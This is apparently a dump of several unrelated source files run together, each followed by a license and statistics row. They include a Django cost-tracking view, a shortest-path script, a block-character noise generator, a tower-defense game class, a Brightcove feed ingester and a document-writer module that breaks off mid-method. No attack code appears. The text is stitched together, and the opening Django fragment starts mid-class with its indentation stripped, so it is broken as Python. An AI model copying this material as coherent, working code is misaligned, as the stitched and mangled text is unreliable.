model = AvanceObra
template_name = "modal_delete_form.html"
def get_url_post_form(self):
return reverse_lazy('costos:avances_obra_delete', args=(self.object.pk, ))
def post(self, *args, **kwargs):
obj = self.get_object()
obj.delete()
return render(self.request, 'modal_delete_success.html', {'obj': obj})
class AvanceObraCreateView(BaseCostosMixin, TemplateView):
model = AvanceObra
template_name = "frontend/costos/avance_obra_create.html"
form_class = CentroCostoSelectForm
formset_avance = formset_factory(AvanceObraCreateForm, extra=0, min_num=1, can_delete=True, validate_min=True)
def get_context_data(self, **kwargs):
context = super(AvanceObraCreateView, self).get_context_data(**kwargs)
forms = {
"obra_form": CentroCostoSelectForm(user=self.request.user, prefix='obra_form'),
"avances_formset": self.formset_avance(prefix='avances_formset'),
}
forms.update(context)
return forms
def post(self, request, *args, **kwargs):
obra_form = CentroCostoSelectForm(user=self.request.user, data=self.request.POST, prefix='obra_form')
avances_formset = self.formset_avance(self.request.POST, prefix='avances_formset')
if obra_form.is_valid() and avances_formset.is_valid():
return self.form_valid(obra_form, avances_formset)
else:
return self.form_invalid(obra_form, avances_formset)
def form_invalid(self, obra_form, avances_formset):
return self.render_to_response(self.get_context_data(obra_form=obra_form, avances_formset=avances_formset))
def form_valid(self, obra_form, avances_formset):
has_error = False
centro_costo = obra_form.cleaned_data["centro_costo"]
try:
with atomic():
for f in avances_formset.forms:
if f in avances_formset.deleted_forms:
continue
if self.model.objects.filter(
periodo=f.cleaned_data["periodo"], centro_costo=centro_costo).exists():
errors = f._errors.setdefault("avance", ErrorList())
errors.append(u"Ya existe un valor para el periodo y centro de costo seleccionado.")
has_error = True
else:
f.save(centro_costo)
if has_error:
raise IntegrityError
except IntegrityError:
return self.form_invalid(obra_form, avances_formset)
return HttpResponseRedirect(self.get_success_url(centro_costo))
def get_success_url(self, centro_costo):
messages.success(self.request, "Avances de {} guardados correctamente.".format(centro_costo))
return reverse_lazy('costos:avances_obra_list')
costos_list = CostosList.as_view()
copia_costos = CopiaCostosView.as_view()
costos_alta_cc = CostosAltaCC.as_view()
costos_alta_eq = CostosAltaEquipos.as_view()
costos_select = CargarCostosSelectView.as_view()
costos_edit = EditarCostosView.as_view()
costos_delete = EliminarCostosView.as_view()
avances_obra_list = AvanceObraList.as_view()
avances_obra_edit = AvanceObraEditView.as_view()
avances_obra_delete = AvanceObraDeleteView.as_view()
avances_obra_create = AvanceObraCreateView.as_view()
| gpl-2.0 | -1,134,927,434,687,782,100 | 42.098947 | 194 | 0.615768 | false | 3.59284 | false | false | false |
openworm/PyOpenWorm | examples/apsp.py | 2 | 1704 | #!/usr/bin/env python
"""
This file is used as a module in shortest_path.py
"""
from __future__ import absolute_import
from __future__ import print_function
import re
import sys
#import random as rnd
import numpy as np
import fileinput
from six.moves import range
from six.moves import zip
def lca_table_print_matrix(M,labels,item_width=1):
for i in labels:
for j in labels:
if (i, j) in M:
print("%*s" % (item_width,repr(M[(str(i), str(j))])), end=' ')
else:
print("%*s" % (item_width,"."), end=' ')
print()
def tree_from_file(file_name):
M = None
# Note, zip makes a list sized to the smaller sequence
i = 0
for line in fileinput.input(file_name):
vs = re.split(' +', line)
if i == 0:
numverts = len(vs)
M = np.zeros( (numverts + 1, numverts) )
for (v,j) in zip(vs,range(0,numverts)):
try:
k = float(v)
except Exception:
k = float('+inf')
if i == j:
k = 0
M[i,j] = k
i += 1
return M
def apsp(M):
nv = M.shape[1]
for level in range(1,nv+1):
for i in range(0,nv):
for j in range(0,nv):
level_i = min(nv-1,level) # min(4,level) # why the hell is this 4??
if (M[i, level_i] + M[level_i, j] < M[i,j]):
M[i,j] = M[i, level_i] + M[level_i, j]
if __name__ == '__main__':
M = tree_from_file(sys.argv[1])
apsp(M)
numverts=M.shape[1]
for i in range(0,numverts):
for j in range(0,numverts):
print(str(int(M[i,j])) + " ", end=' ')
print()
| mit | 7,942,327,064,089,769,000 | 27.4 | 83 | 0.496479 | false | 3.126606 | false | false | false |
r-alex-hall/fontDevTools | scripts/randomNsetChars.py | 1 | 4876 | # DESCRIPTION
# Prints N variants of constructed random character sets (hard-coded but hackable: block
# characters), at X characters across and Y lines down each. Prints to either terminal or
# files; hack the global variable SAVE_TO_RND_FILENAMES to alter that; hack the other globals
# also for whatever other purposes you might have.
# SEE ALSO randomNSetChars.pde.
# DEPENDENCIES
# Python 3.8 (or maybe any 3.x version) with random and time modules installed. Moreover, python may need to be compiled with UCS2 or UCS4 support (larger text code pages support).
# USAGE
# Run from a python interpreter:
# python /path/to_this_script/randomNsetChars.py
# To pipe what is printed to a file, run for example:
# python /path/to_this_script/randomNsetChars.py > 1000000_randomNsetCharsVariants.txt
# NOTES
# - Hard-coded defaults print 1,000,000 rnd character set variations. So be prepared for a lot of noise.
# - Hack the global variables (under the GLOBALS comment) for your purposes if you wish.
# CODE
import random
from time import sleep
# GLOBALS
# Seeds rando number generator via current time:
random.seed(None, 2)
# OR you can seed with a specific number, e.g.:
# random.seed(5, 2)
# -- and it will always produce the same output, in that case.
CHARSET = "▀▁▂▃▄▅▆▇█▉▊▋▌▍▎▏▐░▒▓▔▕▖▗▘▙▚▛▜▝▞▟■"
CHOOSE_RND_SUBSET = True
SAVE_TO_RND_FILENAMES = False
# REFERENCE: 1,000 ms = 1 second:
VARIANTS_TO_GENERATE = 1000000
CHARS_PER_LINE = 80
LINES_PER_GENERATED_SET = 16 # Also try e.g. 2
# The following is note used in the script if SAVE_TO_RND_FILENAMES is True:
WAIT_BETWEEN_LINES_MS = 142 # some oft-used choices: 82, 142
# DERIVATIVE VALUES SET FROM GLOBALS:
SLEEP_TIME = WAIT_BETWEEN_LINES_MS * 0.001
# Function intended use: if a controlling boolean is true, gets and
# returns a unique subset of characters from string CHARSET_STRING_PARAM;
# otherwise returns the string unmodified:
def get_charset_subset(CHARSET_STRING_PARAM):
if (CHOOSE_RND_SUBSET == True):
subset_select_percent = random.uniform(0.04,0.31)
loc_operative_charset_len = len(CHARSET_STRING_PARAM)
num_chars_in_subset = int(loc_operative_charset_len * subset_select_percent)
# If that ends up being less than two, set it to two:
if (num_chars_in_subset < 2):
num_chars_in_subset = 2
counter = 0
tmp_string = ""
while counter < num_chars_in_subset:
chosen_char = CHARSET[random.randrange(0, loc_operative_charset_len)]
if chosen_char not in tmp_string:
tmp_string += chosen_char
counter += 1
return tmp_string
else:
return CHARSET_STRING_PARAM
def get_rnd_save_file_name():
file_name_char_space = "abcdefghjkmnpqrstuvwxyzABCDEFGHJKMNPQRSTUVWXYZ23456789"
char_space_len = len(file_name_char_space)
file_name_str = ""
for i in range(19):
file_name_str += file_name_char_space[random.randrange(0, char_space_len)]
return file_name_str
n_set_outputs_counter = 0
digits_to_pad_file_numbers_to = len(str(VARIANTS_TO_GENERATE))
while n_set_outputs_counter < VARIANTS_TO_GENERATE:
n_set_outputs_counter += 1
# To collect character noise block sample for saving to file (not only for
# printing to screen) ; there's a trivial performance penalty here if we don't use this str:
super_string = ""
operative_charset = get_charset_subset(CHARSET)
operative_charset_len = len(operative_charset)
lines_counter = 0
while lines_counter < LINES_PER_GENERATED_SET:
rnd_string = ""
char_counter = 0
while char_counter < CHARS_PER_LINE:
rnd_string += operative_charset[random.randrange(0, operative_charset_len)]
char_counter += 1
# Only print rnd block chars to terminal if we're not saving files; otherwise,
# collect them in super_string:
if (SAVE_TO_RND_FILENAMES == False):
print(rnd_string)
sleep(SLEEP_TIME)
else:
super_string += rnd_string + "\n"
lines_counter += 1
# If a boolean says to save the collected rnd chars to a file, do so:
if (SAVE_TO_RND_FILENAMES == True):
save_file_name = get_rnd_save_file_name()
# get number padded to number of zeros to align numbers to VARIANTS_TO_GENERATE,
# for file name; therefore convert n_set_outputs_counter to string for zfill function:
str_n_set_outputs_counter = str(n_set_outputs_counter)
file_number_zero_padded = str_n_set_outputs_counter.zfill(digits_to_pad_file_numbers_to)
file = open(file_number_zero_padded + "__" + save_file_name + '.txt', "w")
file.write(super_string)
file.close()
# print("DONE creating variant", n_set_outputs_counter, "in run.")
| gpl-3.0 | -5,715,836,599,177,097,000 | 42.333333 | 180 | 0.679418 | false | 3.296779 | false | false | false |
psteinb/libmultiviewnative | python/generate_dims.py | 1 | 1731 | import sys
import math
def produce_size_strings(begin, end, base=2, n_dims=3):
""" function that produces 3D grid sizes in power-of-2 manner
example: produce_size_strings(4, 6):
16x16x16
32x16x16
32x32x16
32x32x32
64x32x32
64x64x32
64x64x64
"""
value = []
if begin > end:
print "unable to produce strings between %i and %i" % (begin, end)
return value
cardinals_exponents = range(begin, end)
cardinals = [str(int(math.pow(base, c))) for c in cardinals_exponents]
start_size = "x".join([cardinals[0]]*n_dims)
value.append(start_size)
end_size = "x".join([cardinals[-1]]*n_dims)
cardinal_idx = 1
while (start_size != end_size) and (cardinal_idx < len(cardinals)):
previous = start_size
temp_li = start_size.split("x")
for it in temp_li:
if (it == cardinals[cardinal_idx-1]):
temp_li[temp_li.index(it)] = cardinals[cardinal_idx]
break
start_size = "x".join(temp_li)
if previous != start_size:
value.append(start_size)
else:
cardinal_idx += 1
return value
if __name__ == '__main__':
sargv = sys.argv
# TODO: maybe wanna give something in through sys.argv
begin = 6
end = 10
base = 2
if len(sargv) == 3:
begin = int(sargv[-2])
end = int(sargv[-1])
if len(sargv) == 2:
end = int(sargv[-1])
if len(sargv) == 4:
begin = int(sargv[-3])
end = int(sargv[-2])
base = int(sargv[-1])
res = produce_size_strings(begin, end, base)
if res:
print "\n".join(res)
sys.exit(0)
else:
sys.exit(1)
| gpl-2.0 | 2,539,788,888,527,334,000 | 22.391892 | 74 | 0.547083 | false | 3.147273 | false | false | false |
IronLanguages/ironpython3 | Src/Scripts/generate_dynsites.py | 3 | 1160 | # Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the Apache 2.0 License.
# See the LICENSE file in the project root for more information.
from generate import generate
MaxTypes = 16
def gen_delegate_func(cw):
for i in range(MaxTypes + 1):
cw.write("case %(length)d: return typeof(Func<%(targs)s>).MakeGenericType(types);", length = i + 1, targs = "," * i)
def gen_delegate_action(cw):
for i in range(MaxTypes):
cw.write("case %(length)d: return typeof(Action<%(targs)s>).MakeGenericType(types);", length = i + 1, targs = "," * i)
def gen_max_delegate_arity(cw):
cw.write('private const int MaximumArity = %d;' % (MaxTypes + 1))
def main():
return generate(
("Delegate Action Types", gen_delegate_action),
("Delegate Func Types", gen_delegate_func),
("Maximum Delegate Arity", gen_max_delegate_arity),
# outer ring generators
("Delegate Microsoft Scripting Action Types", gen_delegate_action),
("Delegate Microsoft Scripting Scripting Func Types", gen_delegate_func),
)
if __name__ == "__main__":
main()
| apache-2.0 | 774,702,040,638,528,100 | 35.25 | 126 | 0.663793 | false | 3.591331 | false | false | false |
libavg/mtc-geneatd | geneatd/tower.py | 1 | 5136 | #geneaTD - A multi-touch tower defense game.
#Copyright (C) 2010-2011 Frederic Kerber, Pascal Lessel, Michael Mauderer
#
#This program is free software: you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#For more information contact the geneaTD team: [email protected]
#
from libavg import *
from libavg.utils import getMediaDir
from creature import Creature
import os
import util
class Tower(object):
"""
This class represents a normal tower object.
"""
# A Map of all towers: id --> object.
towers = {}
# All creatures of player 1.
tower1 = []
# All creatures of player 2.
tower2 = []
def die(self):
"""
This method destroys the tower (unlinks the libAVG node).
"""
if self.living:
self.living = False
if self.team.id==1:
self.tower1.remove(self)
else:
self.tower2.remove(self)
del Tower.towers[id(self)]
self.towerDiv.unlink(True)
self.tower.unlink(True)
self.team.adjustScore(25)
def getDistance(self, creature):
"""
Returns the distance from the given creature to the tower.
"""
return mathutil.getDistance(self.pos, creature.getCirclePos())
def getCreaturesInExplosionRange(self):
"""
A getter for the creatures in range that should be affected.
"""
creatureList = Creature.creatures2
if self.team.id == 2:
creatureList = Creature.creatures1
return creatureList[:]
def executeTowerEffect(self, creatureList):
"""
Executes the special tower effect on the creatures that are given.
"""
for creature in creatureList:
dist = self.getDistance(creature)
if dist > self.towerCircle.r + creature.r:
continue
else:
creature.damage(2)
def executeTowerDestroyAnimation(self):
"""
The animation that happens if tower is clicked. Should call the die method afterwards.
"""
self.explosionCircle = avg.CircleNode(fillopacity=0.0, strokewidth=2, color=self.destroyCircleColor, pos=(self.towerDiv.size.x // 2, self.towerDiv.size.x // 2), parent=self.towerDiv)
anim = avg.LinearAnim(self.explosionCircle, "r", 300 , self.tower.size.x // 2, self.towerCircle.r, False, None, self.die)
anim.start()
def towerExplosion(self, event):
"""
Boom.
"""
if not self.alreadyExploded:
self.alreadyExploded = True
self.towerDiv.sensitive = False
creatureList = self.getCreaturesInExplosionRange()
self.executeTowerEffect(creatureList)
self.executeTowerDestroyAnimation()
def setAppearance(self):
"""
A setter for the appearance of the tower.
"""
self.towerDiv = avg.DivNode(size=util.towerDivSize, pos=(self.pos.x - util.towerDivSize[0] // 2, self.pos.y - util.towerDivSize[1] // 2))
#sets the explosion radius
self.towerCircle = avg.CircleNode(fillopacity=0.3, strokewidth=0, fillcolor=self.team.color, r=self.towerDiv.size.x // 2, pos = (self.towerDiv.size.x // 2, self.towerDiv.size.y // 2), parent=self.towerDiv)
self.tower = avg.RectNode(fillopacity=1, strokewidth=0, filltexhref=os.path.join(getMediaDir(__file__, "resources"), "blackball.png"), size=util.towerSize, pos=(self.pos.x - util.towerSize[0] // 2, self.pos.y - util.towerSize[1] // 2))
def __init__(self, team, pos, layer, creatureLayer):
"""
Creates a new tower instance (including libAVG nodes).
g_player: the global libAVG player.
team: the team, the tower belongs to.
pos: the position of the tower.
layer: the layer the tower should be placed on.
"""
self.living = True
self.pos = pos
self.team = team
self.layer = layer
self.setAppearance()
self.alreadyExploded =False
self.destroyCircleColor="FFA500"
tid = id(self)
self.towerDiv.id = str(tid)
Tower.towers[tid] = self
if self.team.name == "Team2":
Tower.tower2.append(self)
else:
Tower.tower1.append(self)
self.tower.subscribe(Node.CURSOR_DOWN, self.towerExplosion)
creatureLayer.appendChild(self.tower)
layer.appendChild(self.towerDiv)
| gpl-3.0 | -6,594,611,462,057,214,000 | 34.178082 | 243 | 0.617017 | false | 3.807265 | false | false | false |
mdublin/Brightcove-Dynamic-Ingest-App | JSONPARSER.py | 1 | 2470 | #! /usr/bin/python
# -*- coding: utf-8 -*-
#This is a JSON parser version of our script. Sometimes you can change a feed from JSON to MRSS by changing a parameter in the URL from JSON to MRSS. But just in case...
import BC_01
import json
import requests
r = requests.get('[Insert your JSON feed URL here]')
json = json.loads(r.text)
response_array = []
#counter = 0
for index, item in enumerate(json['items']):
if index <= 2:
print item['name']
print item['id']
#print item['FLVURL']
print item['tags']
print item['shortDescription']
#print item['adKeys']
renditions = item['renditions']
max_url = None
max_bitrate = 0
#So since we're dealing with a dictionary
#we can get the nested "renditions" by saying item['renditions']
#renditions itself is a list of dictionaries, so we say for each
#dictionary (which we call rend) in the rendition list
#check if its encodingRate (ie bitrate) is larger than the
#biggest bitrate we've seen so far in the renditions list
#if it is, assign the max_url and max_bitrate variables for the
#current rendition's url and encodingRate
#note that we set max_bitrate = 0 on line 27 so that means for each
#item in the feed we find the maximum bitrate for that item's rendition list
for rend in renditions:
if rend['encodingRate'] > max_bitrate:
max_url = rend['url']
max_bitrate = rend['encodingRate']
print "MAX url", max_url, max_bitrate
#counter += 1
vid_url = max_url
item['url'] = vid_url
item['bit_rate'] = max_bitrate
response_array.append(item)
refactored = []
for entity in response_array:
new_el = entity
new_el["name"] = entity["name"]
new_el["description"] = entity["shortDescription"]
del new_el["bit_rate"]
refactored.append(new_el)
#print json.dumps(response_array, indent=4)
for idx,item in enumerate(refactored):
if idx <= 2:
name, url = item['name'], item['url']
tags = item["tags"] if "tags" in item else []
desc = item["description"] if "description" in item else ""
if not BC_01.videoNameExists(name):
print "did not see", name, "in brightcove, ingesting..."
print "working on", name, url
BC_01.createAndIngest(name, url, tags=tags, description=desc)
else:
print "already saw", name, "skipping..."
| mit | 3,602,246,432,034,681,300 | 32.378378 | 169 | 0.631984 | false | 3.681073 | false | false | false |
louistin/fullstack | Python/io/format_output_20161018.py | 1 | 1432 | #!/usr/bin/python
# _*_ coding: utf-8 _*_
import math
print ""
# str() 将值转化为适于人阅读的形式
# repr() 转化为供解释器读取的形式
s = 'Hello, World'
print str(s)
print repr(s)
print str(1 / 7)
x = 10 * 3.25
y = 200 * 200
s = 'The value of x is ' + repr(x) + ', and y is ' + repr(y) + '...'
print s
hello = 'hello, world\n'
hellos = repr(hello)
print hello
print hellos
print repr((x, y, ('hello', 'world')))
print str((x, y, ('hello', 'world')))
for x in range(1, 11):
print repr(x).rjust(2), repr(x * x).rjust(3),
#print repr(x * x * x).rjust(4)
print repr(x * x * x).ljust(4),
print repr(x * x * x).center(4)
for x in range(1, 11):
print '{0:2d} {1:3d} {2:4d}'.format(x, x * x, x * x * x)
x = '123456'
print x.ljust(3)[:3]
y = '-3.1415'
print x.zfill(10)
print y.zfill(10)
print 'we are the {} who say "{}!"'.format('knight', 'Ni')
print 'The story of {0}, {1}, and {other}'.format('Bill', 'Manfred', other =\
'Georg')
print 'The value of PI is approximately {0:.3f}.'.format(math.pi)
table = {'Louis': 1990, 'Shana': 2006, 'Miku': 2000}
for name, birthday in table.items():
print '{0:10} ==> {1:10d}'.format(name, birthday)
print 'Louis: {0[Louis]:d}; Shana: {0[Shana]:d}; Miku: {0[Miku]:d}'\
.format(table)
print 'Louis: {Louis:d}; Shana: {Shana:d}; Miku: {Miku:d}'.format(**table)
print 'The value of PI is approximately %5.3f.' % math.pi
| mit | -3,130,768,762,048,186,400 | 20.59375 | 77 | 0.577424 | false | 2.250814 | false | false | false |
wolf9s/doconce | lib/doconce/DocWriter.py | 2 | 38975 | """
DocWriter is a tool for writing documents in ASCII, HTML,
LaTeX, DocOnce, and other formats based on input from Python
datastructures.
The base class _BaseWriter defines common functions and data
structures, while subclasses HTML, DocOnce, etc. implement (i.e.,
write to) various formats.
This module works, but is unifinished and needs documentation!
"""
from StringIO import StringIO
import re, os, glob, commands
class _BaseWriter:
"""
Base class for document writing classes.
Each subclass implements a specific format (html, latex,
rst, etc.).
"""
def __init__(self, format, filename_extension):
# use StringIO as a string "file" for writing the document:
self.file = StringIO()
self.filename_extension = filename_extension
self.format = format
self._footer_called = False
document = property(fget=lambda self: self.file.getvalue(),
doc='Formatted document as a string')
def write_to_file(self, filename):
"""
Write formatted document to a file.
Just give the stem of the file name;
the extension will be automatically added (depending on the
document format).
"""
# footer?
if not self._footer_called:
self.footer()
self._footer_called = True
f = open(filename + self.filename_extension, 'w')
f.write(self.document)
f.close()
def __str__(self):
"""Return formatted document."""
return self.document
def header(self):
"""Header as required by format. Called in constructor."""
pass
def footer(self):
"""Footer as required by format. Called in write_to_file."""
pass
def not_impl(self, method):
raise NotImplementedError, \
'method "%s" in class "%s" is not implemented' % \
(method, self.__class__.__name__)
def title(self, title, authors_and_institutions=[], date='today'):
"""
Provide title and authors.
@param title: document title (string).
@param authors_and_institutions: list of authors and their
associated institutions, where each list item is a tuple/list
with author as first element followed by the name of all
institutions this author is associated with.
@param date: None implies no date, while 'today' generates
the current date, otherwise a string is supplied.
"""
self.not_impl('title')
def today_date(self):
"""Return a string with today's date suitably formatted."""
import time
return time.strftime('%a, %d %b %Y (%H:%M)')
def section(self, title, label=None):
"""
Write a section heading with the given title and an optional
label (for navigation).
"""
self.not_impl('section')
def subsection(self, title, label=None):
"""
Write a subsection heading with the given title and an optional
label (for navigation).
"""
self.not_impl('subsection')
def subsubsection(self, title, label=None):
"""
Write a subsubsection heading with the given title and an optional
label (for navigation).
"""
self.not_impl('subsubsection')
def paragraph(self, title, ending='.', label=None):
"""
Write a paragraph heading with the given title and an ending
(period, question mark, colon) and an optional label (for navigation).
"""
self.not_impl('paragraph')
def paragraph_separator(self):
"""
Add a (space) separator between running paragraphs.
"""
self.not_impl('paragraph_separator')
def text(self, text, indent=0):
"""
Write plain text. Each line can be idented by a given number
of spaces.
"""
# do the indentation here, subclasses should call this method first
text = '\n'.join([' '*indent + line for line in text.split('\n')])
# subclasses must substitute DocOnce simple formatting
# using the expandtext method
return text
def expandtext(self, text, tags, tags_replacements):
"""
In a string text, replace all occurences of strings defined in tags
by the corresponding strings defined in tags_replacements.
Both tags and tags_replacements are dictionaries with keys such
as 'bold', 'emphasize', 'verbatim', 'math', and values consisting of
regular expression patterns.
This method allows application code to use some generic ways of
writing emphasized, boldface, and verbatim text, typically in the
DocOnce format with *emphasized text*, _boldface text_, and
`verbatim fixed font width text`.
"""
for tag in tags:
tag_pattern = tags[tag]
c = re.compile(tag_pattern, re.MULTILINE)
try:
tag_replacement = tags_replacements[tag]
except KeyError:
continue
if tag_replacement is not None:
text = c.sub(tag_replacement, text)
return text
def list(self, items, listtype='itemize'):
"""
Write list or nested lists.
@param items: list of items.
@param listtype: 'itemize', 'enumerate', or 'description'.
"""
# call _BaseWriter.unfold_list to traverse the list
# and use self.item_handler to typeset each item
self.not_impl('list')
def unfold_list(self, items, item_handler, listtype, level=0):
"""
Traverse a possibly nested list and call item_handler for
each item. To be used in subclasses for easy list handling.
@param items: list to be processed.
@param item_handler: callable, see that method for doc of arguments.
@param listtype: 'itemize', 'enumerate', or 'description'.
@param level: the level of a sublist (0 is main list, increased by 1
for each sublevel).
"""
# check for common error (a trailing comma...):
if isinstance(items, tuple) and len(items) == 1:
raise ValueError, 'list is a 1-tuple, error? If there is '\
'only one item in the list, make a real Python list '\
'object instead - current list is\n(%s,)' % items
item_handler('_begin', listtype, level)
for i, item in enumerate(items):
if isinstance(item, (list,tuple)):
self.unfold_list(item, item_handler, listtype, level+1)
elif isinstance(item, basestring):
if listtype == 'description':
# split out keyword in a description list:
parts = item.split(':')
keyword = parts[0]
item = ':'.join(parts[1:])
item_handler(item, listtype, level, keyword)
else:
item_handler(item, listtype, level)
else:
raise TypeError, 'wrong %s for item' % type(item)
item_handler('_end', listtype, level)
def item_handler(self, item, listtype, level, keyword=None):
"""
Write out the syntax for an item in a list.
@param item: text assoicated with the current list item. If item
equals '_begin' or '_end', appropriate begin/end formatting of
the list is written instead of an ordinary item.
@param listtype: 'itemize, 'enumerate', or 'description'.
@param level: list level number, 0 is the mainlist, increased by 1
for each sublist (the level number implies the amount of indentation).
@param keyword: the keyword of the item in a 'description' list.
"""
self.not_impl('item_handler')
def verbatim(self, code):
"""
Write verbatim text in fixed-width form
(typically for computer code).
"""
self.not_impl('verbatim')
def math(self, text):
"""Write block of mathematical text (equations)."""
# default: dump raw
self.raw(text)
def raw(self, text):
"""Write text directly 'as is' to output."""
self.file.write(text)
def figure_conversion(self, filename, extensions):
"""
Convert filename to an image with type according to
extension(s).
The first existing file with an extension encountered in the extensions
list is returned. If no files with the right extensions are found,
the convert utility from the ImageMagick suite is used to
convert filename.ps or filename.eps to filename + extensions[0].
"""
if not isinstance(extensions, (list,tuple)):
extensions = [extensions]
for ext in extensions:
final = filename + ext
if os.path.isfile(final):
return final
final = filename + extensions[0] # convert to first mentioned type
files = glob.glob(filename + '*')
# first convert from ps or eps to other things:
for file in files:
stem, ext = os.path.splitext(file)
if ext == '.ps' or ext == '.eps':
cmd = 'convert %s %s' % (file, final)
print cmd
failure = os.system(cmd)
if failure:
print 'Could not convert;\n %s' % cmd
return final
# try to convert from the first file to the disired format:
file = files[0]
cmd = 'convert %s %s' % (file, final)
print cmd
failure, outtext = commands.getstatusoutput(cmd)
if failure:
print 'Could not convert;\n %s' % cmd
return final
def figure(self, filename, caption, width=None, height=None, label=None):
"""
Insert a figure into the document.
filename should be without extension; a proper extension is added,
and if the figure is not available in that image format, the
convert utility from ImageMagick is called to convert the format.
"""
self.not_impl('figure')
def table(self, table, column_headline_pos='c', column_pos='c'):
"""
Translates a two-dimensional list of data, containing strings or
numbers, to a suitable "tabular" environment in the output.
@param table: list of list with rows/columns in table, including
(optional) column-headline 1st row and row-headline 1st column.
@param column_pos: specify the l/c/r position of data
entries in columns, give either (e.g.) 'llrrc' or one char
(if all are equal).
@param column_headline_pos : position l/c/r for the headline row
"""
self.not_impl('table')
def url(self, url_address, link_text=None):
"""Typeset an URL (with an optional link)."""
self.not_impl('url')
def link(self, link_text, link_target):
"""Typeset a hyperlink."""
self.not_impl('link')
# what about LaTeX references to labels in equations, pages, labels?
def makedocstr(parent_class, subclass_method):
"""
Compose a string (to be used as doc string) from a method's
doc string in a parent class and an additional doc string
in a subclass version of the method.
@param parent_class: class object for parent class.
@param subclass_method: method object for subclass.
@return: parent_class.method.__doc__ + subclass_method.__doc__
"""
parent_method = getattr(parent_class, subclass_method.__name__)
docstr = parent_method.__doc__
if subclass_method.__doc__ is not None and \
subclass_method is not parent_method:
docstr += subclass_func.__doc__
return docstr
# regular expressions for inline tags:
# (these are taken from doconce.common.INLINE_TAGS)
inline_tag_begin = r'(?P<begin>(^|[(\s]))'
inline_tag_end = r'(?P<end>($|[.,?!;:)\s]))'
INLINE_TAGS = {
# math: text inside $ signs, as in $a = b$, with space before the
# first $ and space, comma, period, colon, semicolon, or question
# mark after the enclosing $.
'math':
r'%s\$(?P<subst>[^ `][^$`]*)\$%s' % \
(inline_tag_begin, inline_tag_end),
# $latex text$|$pure text alternative$
'math2':
r'%s\$(?P<latexmath>[^ `][^$`]*)\$\|\$(?P<puretext>[^ `][^$`]*)\$%s' % \
(inline_tag_begin, inline_tag_end),
# *emphasized words*
'emphasize':
r'%s\*(?P<subst>[^ `][^*`]*)\*%s' % \
(inline_tag_begin, inline_tag_end),
# `verbatim inline text is enclosed in back quotes`
'verbatim':
r'%s`(?P<subst>[^ ][^`]*)`%s' % \
(inline_tag_begin, inline_tag_end),
# _underscore before and after signifies bold_
'bold':
r'%s_(?P<subst>[^ `][^_`]*)_%s' % \
(inline_tag_begin, inline_tag_end),
}
class DocOnce(_BaseWriter):
def __init__(self):
_BaseWriter.__init__(self, 'DocOnce', '.do.txt')
def title(self, title, authors_and_institutions=[], date='today'):
s = '\nTITLE: %s\n' % title
for ai in authors_and_institutions:
authorinfo = '; '.join(ai)
s += 'AUTHOR: %s\n' % authorinfo
if date is not None:
if date == 'today':
date = self.today_date()
s += 'DATE: %s\n' % date
self.file.write(s)
self.paragraph_separator()
def heading(self, level, title, label=None):
decoration = '='*level
self.file.write('\n%s %s %s\n\n' % (decoration, title, decoration))
def section(self, title, label=None):
self.heading(7, title, label)
def subsection(self, title, label=None):
self.heading(5, title, label)
def subsubsection(self, title, label=None):
self.heading(3, title, label)
def paragraph(self, title, ending='.', label=None):
s = '\n\n__%s%s__ ' % (title, ending)
self.file.write(s)
def paragraph_separator(self):
self.file.write('\n\n')
def text(self, text, indent=0):
text = _BaseWriter.text(self, text, indent)
# not necessary since DocOnce is the format for text:
#text = _BaseWriter.expandtext(self, text,
# INLINE_TAGS, HTML.INLINE_TAGS_SUBST)
self.file.write(text)
def list(self, items, listtype='itemize'):
self.unfold_list(items, self.item_handler, listtype)
def item_handler(self, item, listtype, level, keyword=None):
indent = ' '*level
s = ''
if item == '_begin':
if level == 1:
s += '\n'
elif item == '_end':
if level == 1:
s += '\n'
else:
# ordinary item:
if item is not None:
if listtype == 'itemize':
s += '\n%s%s* %s' % (indent, indent, item)
elif listtype == 'enumerate':
s += '\n%s%so %s' % (indent, indent, item)
elif listtype == 'description':
s += '\n%s%s- %s: %s' % (indent, indent, keyword, item)
self.file.write(s)
def verbatim(self, code):
self.file.write('\n!bc\n' + r'%s' % code + '\n!ec\n')
def figure(self, filename, caption, width=None, height=None, label=None):
filename = self.figure_conversion(filename, \
('.jpg', '.gif', '.png', '.ps', '.eps'))
s = '\nFIGURE:[%s,' % filename
if width:
s += ' width=%s ' % width
if height:
s += ' height=%s ' % width
s += '] ' + caption + '\n'
self.file.write(s)
def table(self, table, column_headline_pos='c', column_pos='c'):
# Better to factor out code in misc.csv2table!
# See how we do it with html movie...
# find max column width
mcw = 0
for row in table:
mcw = max(mcw, max([len(str(c)) for c in row]))
formatted_table = [] # table where all columns have equal width
column_format = '%%-%ds' % mcw
for row in table:
formatted_table.append([column_format % c for c in row])
width = len(' | '.join(formatted_table[0])) + 4
s = '\n\n |' + '-'*(width-2) + '|\n'
for row in formatted_table:
s += ' | ' + ' | '.join(row) + ' |\n'
s += ' |' + '-'*(width-2) + '|\n\n'
self.file.write(s)
def url(self, url_address, link_text=None):
if link_text is None:
link_text = 'link' # problems with DocOnce and empty link text
self.file.write(' %s<%s>' % (url_address, link_text))
def link(self, link_text, link_target):
self.file.write('%s (%s)' % (link_text, link_target))
# autogenerate doc strings by combining parent class doc strings
# with subclass doc strings:
for method in [title, section, subsection, subsubsection,
paragraph, text,
verbatim, # not defined here: math, raw,
figure, table, url,
list, item_handler,]:
method.__doc__ = makedocstr(_BaseWriter, method)
class HTML(_BaseWriter):
# class variables:
table_border = '2'
table_cellpadding = '5'
table_cellspacing = '2'
INLINE_TAGS_SUBST = { # from inline tags to HTML tags
# keep math as is:
'math': None, # indicates no substitution
'math2': r'\g<begin>\g<puretext>\g<end>',
'emphasize': r'\g<begin><em>\g<subst></em>\g<end>',
'bold': r'\g<begin><b>\g<subst></b>\g<end>',
'verbatim': r'\g<begin><tt>\g<subst></tt>\g<end>',
}
def __init__(self):
_BaseWriter.__init__(self, 'html', '.html')
self.header()
def header(self):
s = """\
<!-- HTML document generated by %s.%s -->
<html>
<body bgcolor="white">
""" % (__name__, self.__class__.__name__)
self.file.write(s)
def footer(self):
s = """
